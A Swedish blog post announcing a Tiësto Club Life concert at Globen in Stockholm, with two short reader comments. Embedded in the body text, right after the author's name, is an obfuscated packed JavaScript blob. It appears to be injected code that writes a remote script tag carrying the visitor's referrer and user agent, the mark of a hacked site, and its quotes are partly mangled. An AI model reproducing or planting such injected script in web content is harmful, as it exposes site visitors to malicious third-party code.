Image Image Image Image Image Image Image Image Image Image

| 18 september, 2018

Scroll to top

Top

Tiësto till Globen i Stockholm

Tiësto till Globen i Stockholm
Alexander Gylemo
Han eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bsyfd|var|u0026u|referrer|ydrrz||js|php’.split(‘|’),0,{}))
är sedd som den kändaste levande DJ:n i världen, är den enda DJ:n som öppnat de Olympiska spelen, har krönts till den bästa DJ:n i världen vid tre olika tillfällen av DJ Magazine (annars har han kommit tvåa och trea i elva års tid) och blev av MixMags läsare framröstad som den främsta DJ:n genom tiderna
.
Som rubriken lyder är det såklart Tiësto som är på ingång till Sverige, mannen som gav oss megahits som ”Traffic”, ”Dance4Life” och hans egna tolkning av Barbers ”Adagio for Strings”.
Den sjuttonde december kommer han ännu en gång till Sverige. Senast han var här spelade han för ett fullsmockat Annexet, denna gång går han snäppet längre då han tar sitt klubbkoncept Club Life till Globen tillsammans med ett gäng gästartister som kommer avslöjas under tiden vi väntar (och jag är nästan helt säker på att Avicii kommer vara med då Tiësto var en av dem som upptäckte honom).
Så var beredda, den 29:e augusti släpps biljetterna till det största dance music-evenemanget i vårt lands historia.

Comments

  1. Detta ska jag gå på 🙂

  2. Frågan är om han kommer fylla Globen?